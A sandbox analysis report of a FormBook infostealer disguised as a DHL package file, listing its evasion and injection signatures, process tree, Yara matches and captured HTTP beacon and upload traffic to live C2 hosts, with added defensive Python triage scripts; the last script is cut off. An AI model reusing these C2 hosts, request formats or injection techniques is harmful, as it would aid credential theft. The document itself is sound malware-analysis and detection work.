
Analysis Report DHL PACKAGE - PDF.exe

Overview

General Information

Sample Name: DHL PACKAGE - PDF.exe
Analysis ID: 286161
MD5: 863bf0dfa1169706f566c070a1e11256
SHA1: 77175726680e40eeefdad0578a1d3377486d9fff
SHA256: a102b644fd134778f28e1105e4645e84ff4d05687351990de90ae27a89f0513b

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Hijacks the control flow in another process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • DHL PACKAGE - PDF.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe' MD5: 863BF0DFA1169706F566C070A1E11256)
    • rundll32.exe (PID: 7016 cmdline: rundll32.exe SitulaCystocele,Hurley MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 7040 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • NETSTAT.EXE (PID: 4912 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 7044 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
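The chain above reads as a sequence. The dropper (the nsis.sf.net error string in the strings section below marks it as an NSIS installer) starts rundll32.exe with a DLL given by bare name and export, SitulaCystocele,Hurley; the file itself is SitulaCystocele.dll in %TEMP%. rundll32 spawns two cmd.exe processes, one of which is hollowed (the FormBook Yara hits sit in cmd.exe at 0x400000). The sandbox then places the already-running explorer.exe (PID 3376, no command line) under that cmd.exe, consistent with the injection signatures listed above. explorer.exe launches 32-bit system binaries from SysWOW64 (autochk.exe, NETSTAT.EXE) as hosts for the final stage, and the NETSTAT.EXE stage runs cmd.exe /c del against the hollowed cmd.exe's image path. The Python below is an added triage script, not part of the Joe Sandbox report: it replays those process-creation events (constructed from the PIDs, images and command lines listed above; the explorer.exe and conhost.exe image paths are not printed in the report and are assumed) and flags the three parent-child relationships that set this tree apart from normal activity.

```python
"""Process-tree triage for the chain shown in the Startup section.

Added example, not part of the Joe Sandbox report. EVENTS is constructed
from the PIDs, images and command lines the report lists; image paths the
report does not print (explorer.exe, conhost.exe) are assumed.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

EVENTS = [
    Proc(6892, 0, r"C:\Users\user\Desktop\DHL PACKAGE - PDF.exe",
         r"'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe'"),
    Proc(7016, 6892, r"C:\Windows\SysWOW64\rundll32.exe",
         "rundll32.exe SitulaCystocele,Hurley"),
    Proc(7040, 7016, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe"),
    Proc(7064, 7016, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe"),
    # explorer.exe image path assumed; the report gives only the PID.
    Proc(3376, 7064, r"C:\Windows\explorer.exe", ""),
    Proc(5536, 3376, r"C:\Windows\SysWOW64\autochk.exe", r"C:\Windows\SysWOW64\autochk.exe"),
    Proc(4912, 3376, r"C:\Windows\SysWOW64\NETSTAT.EXE", r"C:\Windows\SysWOW64\NETSTAT.EXE"),
    Proc(7044, 4912, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Windows\SysWOW64\cmd.exe'"),
    # conhost.exe image path assumed from its command line.
    Proc(7032, 7044, r"C:\Windows\System32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# "/c del <path>" with optional single or double quotes around the path.
DEL_CMD = re.compile(r"/c\s+del\s+['\"]?([^'\"]+?)['\"]?\s*$", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return [(pid, rule_name)] for the three chain-specific anomalies."""
    by_pid = {p.pid: p for p in events}
    images = {p.image.lower() for p in events}
    findings = []
    for p in events:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)

        # 1. rundll32 handed a DLL by bare name: no drive, no directory,
        #    no .dll extension (here the DLL had been dropped to %TEMP%).
        if name == "rundll32.exe":
            args = p.cmdline.split(None, 1)
            if len(args) == 2:
                dll = args[1].split(",", 1)[0]
                if "\\" not in dll and ":" not in dll:
                    findings.append((p.pid, "rundll32_dll_by_bare_name"))

        # 2. explorer.exe starting a 32-bit system binary from SysWOW64 with
        #    the bare image path as command line: how the injected explorer
        #    thread launched NETSTAT.EXE and autochk.exe as stage hosts.
        if parent is not None and basename(parent.image) == "explorer.exe":
            if "\\syswow64\\" in p.image.lower() and \
                    p.cmdline.strip("'\" ").lower() == p.image.lower():
                findings.append((p.pid, "explorer_spawns_syswow64_no_args"))

        # 3. cmd.exe /c del whose target is the image of another process in
        #    the same tree: clean-up of the hollowed cmd.exe stage.
        if name == "cmd.exe":
            m = DEL_CMD.search(p.cmdline)
            if m and m.group(1).lower() in images:
                findings.append((p.pid, "cmd_deletes_tree_member_image"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

Rule 2 is the one that needs tuning before it goes into a detection pipeline: explorer.exe also starts programs the user double-clicks with the image path as the whole command line, so it should be restricted to SysWOW64 binaries users do not start by hand, or joined with the "System process connects to network" observation, which is what makes this explorer.exe suspicious in the first place.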

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 4.2.cmd.exe.400000.0.raw.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
Source: 4.2.cmd.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
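Two of the rule strings above say more than their names. Formbook_1's $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) disassembles to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, which is the RDTSC timing check behind the "Tries to detect virtualization through RDTSC time measurements" signature. The three strings of the JPCERT/CC rule each begin with 0x68, the push imm32 opcode, so they match the constants 0xE17B1C34, 0xC5902A38 and 0x8C7FD853 being pushed; the rule's string names indicate these are the hashed names under which the malware resolves sqlite3_step, sqlite3_column_text and sqlite3_column_blob, the calls it needs to read browser credential databases. The hash function itself is not on this page and is not reconstructed here. The Python below is an added example, not part of the report or of either rule: it re-implements the byte-sequence matching over a buffer (a constructed one by default, or a memory dump passed as the first argument) and decodes the pushed immediates.

```python
"""Scan a buffer for the Formbook byte patterns listed above.

Added example, not part of the report or of the quoted rules. The hex
patterns are copied from the rule strings shown in this report; the
buffer scanned by default is constructed test data, not a real dump.
"""
import struct
import sys

PATTERNS = {
    # Formbook_1 $sequence_0: add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "sequence_0_rdtsc": "03 C8 0F 31 2B C1 89 45 FC",
    # JPCERT/CC Formbook rule: push imm32 of hashed sqlite3 API names
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}


def hex_to_bytes(pattern):
    """'03 C8 0F' -> b'\\x03\\xc8\\x0f'."""
    return bytes.fromhex(pattern.replace(" ", ""))


def scan(buf, patterns=PATTERNS):
    """Return {name: [offset, ...]} for every occurrence of each pattern."""
    hits = {}
    for name, pattern in patterns.items():
        needle = hex_to_bytes(pattern)
        pos, offsets = buf.find(needle), []
        while pos != -1:
            offsets.append(pos)
            pos = buf.find(needle, pos + 1)
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(pattern):
    """Decode a 5-byte 'push imm32' (opcode 0x68) to its little-endian constant."""
    b = hex_to_bytes(pattern)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", b[1:])[0]


def build_sample():
    """Constructed buffer: NOP filler with three patterns at known offsets,
    sqlite3step placed twice to mirror the double hit in the report."""
    buf = bytearray(b"\x90" * 0x100)
    buf[0x10:0x19] = hex_to_bytes(PATTERNS["sequence_0_rdtsc"])
    buf[0x40:0x45] = hex_to_bytes(PATTERNS["sqlite3step"])
    buf[0x80:0x85] = hex_to_bytes(PATTERNS["sqlite3step"])
    buf[0xA0:0xA5] = hex_to_bytes(PATTERNS["sqlite3blob"])
    return bytes(buf)


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for name, offsets in scan(data).items():
        print(name, [hex(o) for o in offsets])
    for name in ("sqlite3step", "sqlite3text", "sqlite3blob"):
        print(name, "pushes", hex(push_imm32(PATTERNS[name])))
```

Run against one of the .sdmp dumps the sandbox exported and the offsets should line up with the ones the report prints for that dump; the decoded constants are what to search for when the same family shows up with a different packer and the sequence-based rules stop matching.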

Sigma Overview

No Sigma rule has matched

Signature Overview



AV Detection:

Antivirus / Scanner detection for submitted sample
Source: DHL PACKAGE - PDF.exe; Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll; Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll; ReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted file
Source: DHL PACKAGE - PDF.exe; Virustotal: Detection: 49%
Source: DHL PACKAGE - PDF.exe; ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match; File source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: DHL PACKAGE - PDF.exe; Joe Sandbox ML: detected
Source: 4.2.cmd.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_10001048 RegDeleteValueA,RegSaveKeyA,WSAAsyncGetServByName,CryptHashData,SwitchToFiber,GetLogicalDriveStringsA,GetNumberOfEventLogRecords,GetTapeStatus,GlobalFree,SetProcessShutdownParameters,WaitForSingleObjectEx,RegLoadKeyA,CryptDestroyHash,UnmapViewOfFile,UnlockFile,GetModuleHandleA,GetProcAddress,GetProcAddress,VirtualAlloc,VirtualAlloc,GetModuleHandleA, 2_2_10001048
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe; Code function: 0_2_00406469 FindFirstFileA,FindClose, 0_2_00406469
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe; Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe; Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040592E
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then pop ebx, 4_2_00407B00
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then pop edi, 4_2_0040E42D
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then pop edi, 4_2_00417C93
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop ebx, 20_2_00DD7B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop edi, 20_2_00DE7C93
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop edi, 20_2_00DDE42D

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.4:49738
Uses netstat to query active network connections and open ports
Source: unknown; Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic; HTTP traffic detected: GET /c232/?SX=lR4lSvRlH9c0riw/yBggHM+d5Bo3+JX5bXcEhZWQxRmDMZVsDGe+7OKw8AttMuBfK5wf&CPTTo2=Of5l7bHh76t0 HTTP/1.1; Host: www.shopendora.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /c232/?SX=ut3XwoAZJP8HSQgtiMu+823Njwb6ecwqvIXCjXOBTiIn6GXyTZBZ4LreNU4Lrku7GkeE&CPTTo2=Of5l7bHh76t0 HTTP/1.1; Host: www.3rdimultimedia.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 23.227.38.64
Source: Joe Sandbox View; IP Address: 160.153.136.3
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: GODADDY-AMSDE
Source: global traffic; HTTP traffic detected: POST /c232/ HTTP/1.1; Host: www.3rdimultimedia.com; Connection: close; Content-Length: 408; Cache-Control: no-cache; Origin: http://www.3rdimultimedia.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.3rdimultimedia.com/c232/; Accept-Language: en-US; Accept-Encoding: gzip, deflate
  Data Raw: 53 58 3d 6d 50 37 74 75 49 49 41 47 65 6b 70 48 52 74 31 39 37 4f 67 6d 6a 4c 5a 6b 54 33 6b 63 4a 4e 68 36 39 32 39 7a 45 36 43 55 41 6f 54 37 43 4c 42 46 73 49 71 28 50 36 5f 53 31 6b 2d 70 31 32 50 4c 30 32 50 76 35 5a 61 5a 37 30 6f 43 4e 53 57 45 67 4d 4c 69 53 4d 65 31 62 4a 48 48 53 6c 46 77 57 7a 38 58 6d 54 59 49 76 35 72 63 71 62 35 4e 66 7a 33 78 74 55 56 71 64 68 2d 67 4e 38 75 49 38 6e 36 72 53 4d 75 33 30 6b 4c 38 69 34 43 36 50 5a 5a 43 55 57 73 65 6f 49 2d 74 5a 4a 49 64 6b 6e 7a 41 75 59 6c 4f 7a 36 4e 42 6f 46 72 7e 5f 34 5f 4a 6c 6b 67 67 38 41 52 67 6d 67 31 44 63 50 54 7a 30 75 66 4f 39 43 69 59 70 77 52 7e 6b 68 33 28 4f 76 4e 59 48 35 4f 45 6d 52 55 4a 77 4a 48 72 73 59 39 4d 70 78 64 4f 6b 28 6b 59 37 6c 76 32 48 57 6c 57 5f 37 53 54 4b 4d 58 47 39 72 79 63 4b 6f 42 43 65 4d 4e 36 75 6c 64 6b 53 28 42 68 4a 59 45 4b 6a 39 56 6e 5f 62 53 7a 53 67 66 33 69 4d 77 46 37 30 4a 35 57 58 53 31 62 46 57 54 77 39 45 63 75 78 66 70 76 47 6e 48 64 49 59 73 73 6a 31 28 35 4e 74 42 4d 7e 73 33 73 5a 51 4a 31 6e 4b 6e 75 55 53 39 4b 52 66 4a 49 55 57 73 4a 56 63 47 30 63 6b 6a 45 32 45 6e 58 71 30 5a 77 6e 6b 59 72 4f 51 64 75 61 41 28 42 7a 67 72 67 68 6f 6b 78 64 44 41 64 73 53 79 77 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: SX=mP7tuIIAGekpHRt197OgmjLZkT3kcJNh6929zE6CUAoT7CLBFsIq(P6_S1k-p12PL02Pv5ZaZ70oCNSWEgMLiSMe1bJHHSlFwWz8XmTYIv5rcqb5Nfz3xtUVqdh-gN8uI8n6rSMu30kL8i4C6PZZCUWseoI-tZJIdknzAuYlOz6NBoFr~_4_Jlkgg8ARgmg1DcPTz0ufO9CiYpwR~kh3(OvNYH5OEmRUJwJHrsY9MpxdOk(kY7lv2HWlW_7STKMXG9rycKoBCeMN6uldkS(BhJYEKj9Vn_bSzSgf3iMwF70J5WXS1bFWTw9EcuxfpvGnHdIYssj1(5NtBM~s3sZQJ1nKnuUS9KRfJIUWsJVcG0ckjE2EnXq0ZwnkYrOQduaA(BzgrghokxdDAdsSyw).
Source: global traffic; HTTP traffic detected: POST /c232/ HTTP/1.1; Host: www.3rdimultimedia.com; Connection: close; Content-Length: 188456; Cache-Control: no-cache; Origin: http://www.3rdimultimedia.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.3rdimultimedia.com/c232/; Accept-Language: en-US; Accept-Encoding: gzip, deflate
  Data Raw (truncated): 53 58 3d 6d 50 37 74 75 4d 38 75 56 4f 77 34 4b 48 31 4f 38 71 7e 6f 69 67 54 4c 67 52 7a 33 56 5f 6b 51 7a 4e 61 58 7a 41 7e 47 64 68 34 4e 78 79 62 42 55 4a 63 68 34 76 36 38 62 56 6b 78 28 46 71 33 47 44 4c 41 76 37 31 6a 5a 37 38 72 4c 75 36 54 45 77 4e 44 6b 79 52 72 6b 37 64 59 48 52 52 65 77 7a 44 61 53 6e 76 59 4e 66 68 70 5a 4c 71 36 4b 61 62 34 76 4e 67 51 6f 5a 38 67 68 5f 34 53 49 65 61 70 39 6e 73 67 67 79 55 63 77 44 4a 6e 77 39 35 73 4d 6b 43 72 62 72 30 74 6f 2d 5a 4d 61 6d 50 52 63 37 73 69 53 33 58 4f 45 76 6f 55 30 74 56 59 4f 78 5a 58 67 37 30 76 75 77 49 65 51 50 37 62 28 67 32 35 57 63 47 73 45 75 52 45 36 6e 4a 38 39 4b 72 79 46 57 4a 4a 44 31 56 42 4b 7a 67 43 75 4d 77 4f 4b 49 4e 72 47 31 50 32 63 73 56 6e 72 58 6d 4b 52 38 4b 49 62 37 73 66 48 50 48 45 54 4b 70 58 45 65 4d 52 78 2d 6c 70 68 79 7a 61 68 35 70 55 4b 6c 5a 50 76 50 33 54 79 52 59 66 6f 7a 63 44 49 72 6b 5f 79 47 6d 72 78 59 4a 64 52 33 63 76 4d 2d 78 39 70 74 65 6f 48 64 49 6c 73 74 6a 54 7e 4d 6c 74 41 64 65 5f 7a 4f 78 71 50 31 6d 61 30 75 45 71 79 61 73 45 4a 4a 38 57 74 37 63 7a 47 48 73 6b 77 43 53 48 6e 32 71 30 66 41 6e 6b 52 4c 50 2d 64 4e 48 58 71 77 43 6e 74 6a 30 44 6d 45 78 52 4e 50 74 61 6f 57 4b 70 50 7a 28 35 6d 70 78 4b 62 49 4a 49 55 51 77 44 28 6a 38 35 33 56 48 38 6e 62 6d 48 78 34 30 51 5a 62 33 55 4b 49 30 35 61 31 6a 54 38 78 57 64 4e 36 42 37 43 45 32 76 6a 4d 59 67 4e 6b 79 4f 48 4f 64 42 70 30 4c 61 55 6e 7e 56 4d 62 61 58 34 4e 76 69 32 64 46 64 75 4a 33 6d 32 47 46 6b 4f 4b 6c 41 78 73 67 74 53 6d 7a 67 77 7a 45 41 75 35 64 4c 68 48 38 61 28 45 39 30 45 55 31 6d 66 33 51 30 4f 31 79 5f 51 58 62 30 59 5a 67 43 6f 64 7e 57 36 37 49 33 76 62 7a 36 4c 75 67 43 7e 54 50 6b 61 48 28 6f 64 70 38 44 79 58 79 52 4f 72 65 75 4b 67 4e 70 74 2d 46 72 6a 64 34 36 78 48 53 2d 32 4d 41 74 68 61 4f 45 47 41 61 66 31 44 41 5a 38 36 6e 72 70 6a 5a 42 37 62 33 51 51 62 69 45 4d 55 31 39 50 63 32 6a 71 75 33 39 57 49 69 53 6b 71 65 6a 5a 4a 4a 41 50 41 72 79 75 44 70 7a 59 35 4e 6e 4e 54 44 59 50 75 4b 79 6f 5f 50 67 73 4a 44 53 64 61 64 75 73 31 4f 73 76 74 4b 61 66 37 43 4a 76 6a 36 4a 6b 6a 37 68 6f 49 75 45 56 4b 66 67 58 55 38 77 4f 77 35 30 33 75 46 35 36 45 4d 33 54 79 7a 34 37 58 65 45 54 57 47 47 39 6d 28 77 7e 4d 42 75 32 6c 58 58 68 7a 64 37 32 4e 39 72 6f 55 7a 4a 6d 58 48 49 70 4a 44 59 6a 66 67 59 49 4d 64 6f 69 31 38 42 6d 4e 33 4d 4a 77 34 6c 79 64 4c 70 75 75 44 65 32 42 71 33 6d 57 68 79 67 66 6a 43 6b 57 46 61 58 58 6e 75 67 37 66 62 52 70 67 43 4c 38 4b 36 6b 6e 56 39 32 53 6b 5a 77 4c 66 56 37 34 72 75 46 74 39 4d 32
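The two request types above are the sample's beacon and its upload. The GETs to www.shopendora.com and www.3rdimultimedia.com carry only Host and Connection headers and no User-Agent, which is the "HTTP GET or POST without a user agent" signature; the POSTs to www.3rdimultimedia.com use a fixed IE11 Trident/7.0 User-Agent, form-urlencoded content, a Referer equal to Origin plus the request path, and an SX= value drawn from an alphabet that adds ( ) ~ _ - and . to the base64 characters. The second POST's Content-Length of 188456 is consistent with the harvested browser and mail data described by the signatures being uploaded, and the Snort alert shows one of the two hosts, 23.227.38.64, answering 403 Forbidden. The Python below is an added example, not part of the report: it parses the captured requests (constructed here from the request lines and headers printed above with CRLFs restored; the POST body is the SX= payload shown, with Content-Length recomputed from it) and emits the indicators a detection engineer would key on.

```python
"""Triage of the HTTP requests captured in this report.

Added example, not part of the report. GET_SAMPLE and POST_SAMPLE are
constructed from the request lines and headers the report prints; the
POST body is the SX= payload shown there, the GET carries none.
"""
import re
from urllib.parse import urlsplit

# Only the characters seen in the captured SX= payloads.
OPAQUE = re.compile(r"^[A-Za-z0-9+/=_\-()~.]+$")
# Short lower-case directory path of the /c232/ kind used by this sample.
C2_PATH = re.compile(r"^/[a-z0-9]{2,6}/$")

GET_SAMPLE = (
    b"GET /c232/?SX=lR4lSvRlH9c0riw/yBggHM+d5Bo3+JX5bXcEhZWQxRmDMZVsDGe+7OKw8AttMuBfK5wf"
    b"&CPTTo2=Of5l7bHh76t0 HTTP/1.1\r\n"
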